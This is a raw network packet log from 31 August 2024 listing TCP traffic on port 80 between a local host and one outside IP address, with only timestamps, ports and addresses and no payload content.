Aug 31, 2024 15:44:11.109960079 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.110691071 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.110708952 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.110719919 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.110729933 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.110732079 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.110742092 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.110755920 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.110774040 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.110800028 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111051083 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111099958 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111105919 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111115932 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111125946 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111150026 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111162901 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111619949 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111628056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111666918 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111809969 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111859083 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.111860037 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111871004 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.111911058 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.112128019 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.112174034 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.112184048 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.112186909 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.112220049 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.112232924 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.112250090 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.112292051 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.114865065 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.114876032 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.114887953 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.114912987 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.114939928 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.115053892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.115101099 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263365030 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263434887 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263492107 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263503075 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263508081 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263519049 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263535976 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263539076 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263547897 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263550043 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263561010 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263576984 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263592958 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263593912 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263607025 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263607025 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263618946 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263632059 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263633966 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263642073 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263645887 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.263664007 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.263691902 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264094114 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264144897 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264153957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264163971 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264174938 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264192104 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264278889 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264317989 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264328957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264354944 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264365911 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264374971 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264403105 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264436960 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264447927 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264457941 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264467955 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264492989 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264503002 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264514923 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264517069 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264525890 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264537096 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264540911 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264549017 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264561892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.264574051 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264602900 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.264624119 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.265310049 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265321016 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265331984 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265362978 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.265376091 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265388012 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265394926 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.265398979 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.265420914 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.265445948 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266136885 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266148090 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266158104 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266185045 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266207933 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266216040 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266238928 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266247988 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266273975 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266288042 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266396999 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266407967 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266419888 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266448021 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266463041 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266473055 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.266475916 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.266525030 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.268007994 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.268052101 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.268179893 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.268229008 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.268395901 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.268435955 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.268451929 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.268498898 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.412673950 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.412684917 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.412750006 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.412750006 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413043976 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413053989 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413063049 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413073063 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413084030 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413105965 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413122892 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413194895 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413217068 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413224936 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413283110 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413291931 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413297892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413309097 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413353920 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413353920 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413386106 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413397074 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413407087 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413420916 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413444996 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413518906 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413532972 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413599968 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413609982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413619041 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413642883 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413645983 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413657904 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413666964 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413676977 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413695097 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413695097 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413845062 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.413952112 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413963079 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.413971901 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414001942 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414027929 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414031982 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414043903 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414051056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414063931 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414071083 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414084911 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414093018 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414097071 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414097071 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414124012 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414145947 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414155960 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414165020 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414170027 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414191008 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414236069 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414272070 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414362907 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414366961 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414380074 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414386034 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414388895 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414417028 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414426088 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414434910 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414444923 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414446115 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414453983 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414469004 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414472103 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414480925 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414483070 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414510012 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414510012 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414608002 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414627075 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414635897 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.414678097 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.414833069 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417609930 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417620897 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417629957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417640924 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417665958 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417671919 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417671919 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417678118 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417690039 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417699099 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417715073 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417715073 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417792082 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417804956 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417815924 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417824030 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417833090 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417843103 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417851925 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417860031 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417862892 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417872906 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417875051 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.417892933 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.417983055 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418077946 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418097019 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418107033 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418152094 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418169975 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418185949 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418194056 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418253899 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418262959 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418273926 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418284893 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418292999 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418304920 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418325901 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418330908 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418382883 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418405056 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418416023 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418425083 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418435097 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.418458939 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.418512106 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.419567108 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419574022 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419578075 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419632912 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419642925 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419661999 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.419686079 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419708014 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419712067 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.419718027 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.419742107 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.419951916 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.422015905 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.422027111 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.422154903 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503338099 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503449917 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503510952 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503524065 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503534079 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503545046 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503556013 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503566980 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503571033 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503577948 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503582954 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503593922 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503604889 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503606081 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503626108 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503635883 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503639936 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503654957 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503659010 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503667116 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503683090 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503684998 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503684998 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503695011 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503706932 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503707886 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503720045 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503729105 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503730059 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503734112 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503746986 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503747940 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503755093 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503761053 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.503794909 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.503925085 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563446045 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563462973 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563481092 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563492060 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563503027 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563514948 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563543081 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563565016 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563575983 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563587904 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563592911 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563601017 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563611031 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563618898 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563627005 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563637972 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563637972 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563657999 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563667059 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563678980 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563689947 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563699007 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563711882 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.563719034 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.563729048 CEST	80	49717	185.215.113.26	192.168.2.5
